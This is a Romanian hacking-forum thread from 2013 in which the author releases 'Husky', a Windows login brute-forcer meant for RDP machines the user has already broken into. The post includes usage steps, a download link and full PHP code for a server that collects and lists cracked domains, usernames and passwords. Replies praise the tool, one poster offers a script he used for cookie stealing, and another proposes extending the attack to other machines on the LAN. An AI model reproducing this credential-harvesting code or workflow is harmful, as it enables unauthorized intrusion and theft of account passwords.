Maximus Posted October 16, 2013 Report Posted October 16, 2013 (edited) Ce este ?Este un tool cu care poti face brute force la conturile din windows. Spre ex. daca ati spart un RDP si utilizatorul are drepturi limitate(Guest), descarcati programul pe RDP alegeti utilizatorii pentru care doriti bruteforce-ul si apasati startRata de succes pentru mine a fost de 15% cu o lista de parole de 48MB.Cum se foloseste ?Porniti programul, in Settings alegem utilizatorii din casuta de sus si ai mutam in casuta de joc folosind butonul Move Down, setam Domain daca este nevoie, la Passwords apasam Load (parolele trebuiesc puse in pass.txt [fisier fix, nu poate fi schimbat]) dupa care apasam Create Combo si asteptam pana se creaza lista combo (combo.txt), selectam modul de livrare a logurilor (via PHP sau Log) dupa care ne ducem la Main unde apasam Start ... si asteptamRecomand No multithreading chiar daca pare mai eficient cu multithreadingPentru a livra log via PHP avem : <?$ip = $_SERVER['REMOTE_ADDR'];$database = "HuskyLogs";$server = "mysql";$user_name = "spide";$password = "oParola";$loginpassword = "oParola";$domain = $_GET["domain"];$user = $_GET["user"];$pass = $_GET["pass"];$type = $_GET["type"];$loginpass = $_GET["loginpass"];if ($loginpass != $loginpassword) { die("iFail");}if (empty($domain) || empty($user) || empty($pass)) { die("iFail");}if ($type == "log") { $db_handle = mysql_connect($server, $user_name, $password); $db_found = mysql_select_db($database, $db_handle); $SQL = "INSERT INTO found (ip, domain, username, password) VALUES ('" . $ip . "', '" . $domain . "', '" . $user . "', '" . $pass . "')"; $result = mysql_query($SQL); mysql_close($db_handle); if ($result == "1") { echo "iSAVED"; }}if ($type == "get") { $con = mysql_connect($server, $user_name, $password); if (!$con) { die('Could not connect!'); } mysql_select_db($database, $con); $result = mysql_query("SELECT * FROM found"); while ($row = mysql_fetch_array($result)) { $ip = $row['ip']; $domain = $row['domain']; $username = $row['username']; $password = $row['password']; echo "$ip -> Domain : $domain / Username : $username / Password : $password<br>"; } mysql_close($con);}?> Nu stau prea bine la capitolul PHP dar daca vreti puteti face chiar voi ceva mai frumos si voi include in arhiva.DO NOT DELETE dog.exe(face parte din proiect) practic programul incearca sa ruleze dog.exe cu drepturile utilizatorilor pe care i-ati selectat ininte de a crea comboScreen : Video : Daca apar probleme va rog frumos sa raportati aici.NET 2.0 (x86 si x64)Download : https://www.dropbox.com/s/66dcz5rv62jm36v/%5BRST%5D%20Husky.rar Edited October 16, 2013 by Maximus 1 Quote
CristianRoflmao Posted October 17, 2013 Report Posted October 17, 2013 Folositor GGCe plm te joci de zici gg?e GJ NU GG !Mersi de tool.Noroc! Quote
Goke Posted October 17, 2013 Report Posted October 17, 2013 defapt .. parca am mai vazut pe league of legends ziceau aia GG adica great game parca Quote
CristianRoflmao Posted October 17, 2013 Report Posted October 17, 2013 (edited) defapt .. parca am mai vazut pe league of legends ziceau aia GG adica great game parcagg= good game,gj = good job.Da stiu pe rst is foarte multi gaym?ri de aia e la moda sa se zica gg la topicuri in loc sa zica gj.Scuzati offtopicul Edited October 17, 2013 by CristianRoflmao Quote
dustfeather Posted October 18, 2013 Report Posted October 18, 2013 (edited) In PHP pune starting tag-ul complet "<?php", ai aici de ce. Nu-i obligatoriu, e doar mai bine in caz ca vrei sa integrezi cu mdb2 sau alte tool-uri de PEAR.Iar log-ul, fa-l un file .log/csv/etc. ca iese script-ul mai mic si nici nu mai depinzi de o conexiune la DB. Daca nu stii cum da-mi mesaj pe privat si iti dau eu unul pe care l-am folosit la cookie stealing Edited October 18, 2013 by dustfeather adding stuff Quote
Maximus Posted October 20, 2013 Author Report Posted October 20, 2013 (edited) UPDATE - v1.1[x] Bug fix[x] Am adaugat ETA[x] Am adaugat x86 si x64 brute-force din consola (mult mai rapid)GUI 8h scan cu 16197696 (combo) posibilitati :https://www.dropbox.com/s/v1fv6jlnwj7bl1z/Screenshot_1.pnghttps://www.dropbox.com/s/zb4os93tsb1pry0/Screenshot_2.pnghttps://www.dropbox.com/s/6locu3hlehmtrnk/Screenshot_3.pnghttps://www.dropbox.com/s/l9dfqst4lkdluk2/Screenshot_4.pnghttps://www.dropbox.com/s/j7l2dpt504hhz1o/Screenshot_5.pngConsole scan cu 16197696 (combo) posibilitati :https://www.dropbox.com/s/ncv5vsx7968z7yx/Screenshot_9.pnghttps://www.dropbox.com/s/doxj6jthr9z1qnl/Screenshot_10.pnghttps://www.dropbox.com/s/9oyziaxxb5h4gpm/Screenshot_11.pnghttps://www.dropbox.com/s/12lrywou5j32upj/Screenshot_12.pngRDP GUI vs. Console :https://www.dropbox.com/s/ocemlnj4ekj3370/Screenshot_7.pnghttps://www.dropbox.com/s/k9dvdb1hofrl3ox/Screenshot_8.pngEu cu un Intel® Pentium® CPU P6100 @ 2.00 GHz & 4.00 GB RAM am ajuns in consola la 2000 incercari pe secunda iar in GUI undeva la 700 incercari pe secunda (ating si 1000 dar greu).Consola e mult mai puternica la brute.Download : https://www.dropbox.com/s/66dcz5rv62jm36v/%5BRST%5D%20Husky.rar Edited October 20, 2013 by Maximus Quote
ovidelu47 Posted October 20, 2013 Report Posted October 20, 2013 Foarte util acest tool multumesc boss. Quote
Maximus Posted October 20, 2013 Author Report Posted October 20, 2013 Ce face mai exact ?Brute force local pentru windows login user/pass Quote
tudor13mn13 Posted October 20, 2013 Report Posted October 20, 2013 Ce face mai exact ?Bruteforce la utilizatorii de pe RDP.Bruteforce = incearca o lista de parole si salveaza parola buna.(ti-am explicat mai pe intelesul tau) Quote
dustfeather Posted October 21, 2013 Report Posted October 21, 2013 Ce face mai exact ?Nu vreau sa fiu nesimtit, dar, stii sa citesti ? Quote
Brenin Posted October 21, 2013 Report Posted October 21, 2013 Frumos.Merge si cu parole goale ?https://rstforums.com/forum/74801-rst-raptora-windows-login-brute-forcer.rst Quote
Maximus Posted October 21, 2013 Author Report Posted October 21, 2013 Frumos.Merge si cu parole goale ?https://rstforums.com/forum/74801-rst-raptora-windows-login-brute-forcer.rstNu, am uitat de chestia asta (am sa adaug si chestia asta). dar sa stii ca n-am vazut ca mai exista o chestie asemanatoare. Quote
ovidelu47 Posted October 22, 2013 Report Posted October 22, 2013 E bun si asta mai trebuie introdusa faza cu parole goale si ar fi frumos ca lumea sa mai propuna cate ceva pentru acest tool si daca spide112 doreste sa mai faca update la acest tool luand in considerare propunerile .Oricum tot respectul pentru tine men. Quote
Brenin Posted October 22, 2013 Report Posted October 22, 2013 Singura imbunatatire care se poate face, este sa se faca bruteforce si la userele de la pc-urile din LAN. se pot lua frumos cu net view, baga-te intr-un for , si incercat si pe ele. Nu trebuie modificat la partea de user decat un PC_NAME/userInsa nu va trebuie acest lucru, numai in cazul in care stiti ce faceti, si cum sa le folositi apoi. Quote
ovidelu47 Posted October 23, 2013 Report Posted October 23, 2013 Ar fi ceva sa vedem ce spune spide112 cand intra. Quote